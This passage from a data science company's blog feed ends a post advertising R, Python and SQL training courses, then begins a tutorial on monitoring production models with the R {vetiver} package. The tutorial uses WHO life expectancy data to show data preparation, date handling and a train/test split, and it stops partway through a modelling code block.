&lt;h4 id="data-visualisation-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Data Visualisation with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 18th March 2025 &amp;amp; 17th June 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python has a number of packages for the effective creation of graphics to communicate your data insights. &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;This course&lt;/a&gt; will examine two popular libraries for creating static 2D plots: Matplotlib and Seaborn. During the training session, we’ll cover plotting basics and customisation of figures with Matplotlib, before moving onto complex statistical visualisations with Seaborn.&lt;/p&gt;
&lt;img src="informal-python.jpg" alt="People in a room with Python logo on the board." style="width: 800px; display: block; margin-left: auto; margin-right: auto; margin-top: 50px"/&gt;
&lt;hr&gt;
&lt;h3 id="sql"&gt;SQL&lt;/h3&gt;
&lt;h4 id="introduction-to-sql"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database/" rel="external"&gt;Introduction to SQL&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 12th February 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Structured Query Language (SQL) defines a standard for communicating with a relational database. In this &lt;a href="https://www.jumpingrivers.com/training/course/sql-introduction-postgres-aws-database" rel="external"&gt;half-day introductory course&lt;/a&gt;, participants will learn the basic SQL syntax for data extraction, filtering and insertion. We will then discuss some considerations for working with databases on the cloud, and finish by learning basic techniques for joining tables.&lt;/p&gt;
&lt;p&gt;The course can be taken either independently or as a precursor to our Intro to SQL with R and Intro to SQL with Python courses (see below).&lt;/p&gt;
&lt;h4 id="an-introduction-to-sql-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;An Introduction to SQL with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. The main focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-sql-databases-aggregation/" rel="external"&gt;this training course&lt;/a&gt; is to introduce SQL databases, write your first SQL queries, and show how R can be used to retrieve and manipulate data stored in a relational database. The course uses both the {DBI} and {dbplyr} packages.&lt;/p&gt;
&lt;p&gt;We use the &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example for public courses. For in-house training, we are happy to adapt the course to match your database requirements.&lt;/p&gt;
&lt;h4 id="introduction-to-sql-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;Introduction to SQL with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Upcoming course dates: 15th April 2025&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using databases is a fundamental part of a data scientist’s role. &lt;a href="https://www.jumpingrivers.com/training/course/python-sql-databases-pandas-sqlalchemy/" rel="external"&gt;This training course&lt;/a&gt; introduces SQL databases and the SQL command syntax, and shows how Python can be used to retrieve and manipulate data held in a relational database. The course also discusses how SQLAlchemy can be used to define and interact with databases using object-oriented Python code.&lt;/p&gt;
&lt;p&gt;We use a &lt;a href="https://www.postgresql.org/" rel="external"&gt;PostgreSQL&lt;/a&gt; database as an example, and communicate with this using a psycopg2 connection.&lt;/p&gt;
&lt;h3 id="so-what-now"&gt;So what now?&lt;/h3&gt;
&lt;p&gt;If you&amp;rsquo;re interested in attending any of our public courses, then you can head straight over to the &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;public booking page&lt;/a&gt;! If you&amp;rsquo;re looking for training for your team, or maybe even something a bit more bespoke, then &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt; and we&amp;rsquo;ll see what we can do! All of our training courses (including courses not mentioned above) can be found in our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course catalogue&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/training-lineup-2025-r-python-bayesian-statistics-machine-learning/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Vetiver: Monitoring Models in Production</title><link>https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/</link><pubDate>Thu, 31 Oct 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This post is the third in our series of blogs on MLOps with vetiver:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/"&gt;Vetiver: First steps in
MLOps&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment-docker/"&gt;Vetiver: Model
Deployment&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Vetiver: Monitoring Models in Production (this post)&lt;/li&gt;
&lt;li&gt;Part 4: &lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment"&gt;Vetiver: MLOps for Python&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In Parts 1 and 2, we introduced the {vetiver} package and its use as a
tool for streamlined MLOps. Using the {palmerpenguins} dataset as an
example, we outlined the steps of training a model using {tidymodels}
then converting this into a {vetiver} model. We then demonstrated the
steps of versioning our trained model and deploying it into production.&lt;/p&gt;
&lt;p&gt;Getting your first model into production is great! But it’s really only
the beginning, as you will now have to carefully monitor it over time to
ensure that it continues to perform as expected on the latest data.
Thankfully, {vetiver} comes with a suite of functions for this exact
purpose!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-vetiver-monitoring-mlops-deployment"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="preparing-the-data"&gt;Preparing the data&lt;/h2&gt;
&lt;p&gt;A crucial step in the monitoring process is the introduction of a time
component. We will be tracking key scoring metrics over time as new data
is collected, so our analysis will now depend on a time dimension
even if our deployed model has no explicit time dependence.&lt;/p&gt;
&lt;p&gt;To demonstrate the monitoring steps, we will be working with the &lt;a href="https://www.kaggle.com/datasets/kumarajarshi/life-expectancy-who/data" rel="external"&gt;World
Health Organisation Life
Expectancy&lt;/a&gt;
data which tracks the average life expectancy in various countries over
a number of years. We start by loading the data:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;download.file&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://www.kaggle.com/api/v1/datasets/download/kumarajarshi/life-expectancy-who&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;archive.zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;unzip&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;archive.zip&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; readr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;read_csv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;./Life Expectancy Data.csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We will attempt to predict the life expectancy using the percentage
expenditure, total expenditure, population, body-mass-index (BMI) and
schooling. Let’s select the columns of interest, tidy up the variable
names and drop any missing values:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; janitor&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;clean_names&lt;/span&gt;(case &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;snake&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; abbreviations &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;BMI&amp;#34;&lt;/span&gt;)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;select&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2,111 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; year life_expectancy percentage_expenditure total_expenditure population&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2015 65 71.3 8.16 33736494&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2014 59.9 73.5 8.18 327582&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2013 59.9 73.2 8.13 31731688&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2012 59.5 78.2 8.52 3696958&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2011 59.2 7.10 7.87 2978599&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2010 58.8 79.7 9.2 2883167&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2009 58.6 56.8 9.42 284331&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2008 58.1 25.9 8.33 2729431&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2007 57.5 10.9 6.73 26616792&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2006 57.3 17.2 7.43 2589345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2,101 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2 more variables: bmi &amp;lt;dbl&amp;gt;, schooling &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The data contains a numeric &lt;code&gt;year&lt;/code&gt; column which will come in handy for
monitoring the model performance over time. However, the {vetiver}
monitoring functions require this column to use &lt;code&gt;&amp;lt;date&amp;gt;&lt;/code&gt;
(&lt;code&gt;&amp;quot;YYYY-MM-DD&amp;quot;&lt;/code&gt;) formatting, and the rows must be sorted in ascending
date order:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; lubridate&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;ymd&lt;/span&gt;(year, truncated &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;2L&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;arrange&lt;/span&gt;(year)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;life_expectancy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # A tibble: 2,111 × 7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; year life_expectancy percentage_expenditure total_expenditure&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;date&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt; &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 1 2000-01-01 54.8 10.4 8.2 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 2 2000-01-01 72.6 91.7 6.26&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 3 2000-01-01 71.3 154. 3.49&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 4 2000-01-01 45.3 15.9 2.79&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 5 2000-01-01 74.1 1349. 9.21&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 6 2000-01-01 72 32.8 6.25&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 7 2000-01-01 79.5 347. 8.8 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 8 2000-01-01 78.1 3557. 1.6 &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 9 2000-01-01 66.6 35.1 4.67&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 10 2000-01-01 65.3 3.70 2.33&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 2,101 more rows&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; # ℹ 3 more variables: population &amp;lt;dbl&amp;gt;, bmi &amp;lt;dbl&amp;gt;, schooling &amp;lt;dbl&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Finally, let’s imagine the year is currently 2002, so our historical
training data should only cover the years 2000 to 2002:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;historic_life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;filter&lt;/span&gt;(year &lt;span style="color:#ff7b72;font-weight:bold"&gt;&amp;lt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;2002-01-01&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Later in this post we will check how our model performs on more recent
data to illustrate the effects of model drift.&lt;/p&gt;
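&lt;p&gt;As a small aside, the date handling used above can be reproduced with base R alone. The sketch below uses made-up years rather than the real dataset, and assumes that each year maps to 1 January, which matches the &lt;code&gt;2000-01-01&lt;/code&gt; values shown earlier. It also makes the cutoff an explicit &lt;code&gt;Date&lt;/code&gt; rather than relying on R converting the string during the comparison.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Toy years, not taken from the real dataset
years = c(2004, 2000, 2002, 2001, 2003)

# Map each year to 1 January of that year
dates = as.Date(paste0(years, &amp;#34;-01-01&amp;#34;))

# Sort in ascending order, as required for monitoring
dates = sort(dates)

# Keep only the historical period using an explicit Date cutoff
cutoff = as.Date(&amp;#34;2002-01-01&amp;#34;)
historic = dates[dates &amp;lt;= cutoff]
format(historic, &amp;#34;%Y&amp;#34;)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;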
&lt;h2 id="training-our-model"&gt;Training our model&lt;/h2&gt;
&lt;p&gt;Before we start training our model, we should split the data into
“train” and “test” sets:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;tidymodels&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data_split &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;initial_split&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; historic_life_expectancy,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; prop &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.7&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;train_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;training&lt;/span&gt;(data_split)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;test_data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; rsample&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;testing&lt;/span&gt;(data_split)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The test set makes up 30% of the historical data and will be used to score
the model on unseen data following training.&lt;/p&gt;
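&lt;p&gt;Note that &lt;code&gt;rsample::initial_split()&lt;/code&gt; assigns rows to the two sets at random, so the metrics quoted in this post will vary slightly between runs. A minimal sketch of making the split reproducible is shown below. The seed value and the toy data frame are arbitrary choices for illustration and are not part of the original analysis.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Toy data standing in for historic_life_expectancy
toy_data = data.frame(x = 1:100, y = (1:100) * 2)

# Fix the random seed so that the same rows are selected on every run
set.seed(2024)
split_a = rsample::initial_split(toy_data, prop = 0.7)

set.seed(2024)
split_b = rsample::initial_split(toy_data, prop = 0.7)

# Check that both splits contain identical training rows
identical(rsample::training(split_a), rsample::training(split_b))

# Row counts of the two sets
nrow(rsample::training(split_a))
nrow(rsample::testing(split_a))
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;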
&lt;p&gt;The code cell below handles the steps of setting up a trained model in
{vetiver} and versioning it using {pins}. For a more detailed
explanation of what this code is doing, we refer the reader back to
&lt;a href="https://www.jumpingrivers.com/blog/vetiver-mlops-tidymodels-deployment/" rel="external"&gt;Part
1&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We will again use a basic &lt;em&gt;K&lt;/em&gt;-nearest-neighbour model, although this
time we have set up the workflow as a regression model since we are
predicting a continuous quantity. Note that this requires the {kknn}
package to be installed.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Train the model with {tidymodels}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;recipe&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; life_expectancy &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt; percentage_expenditure &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; total_expenditure &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; population &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; bmi &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; schooling,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; train_data
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
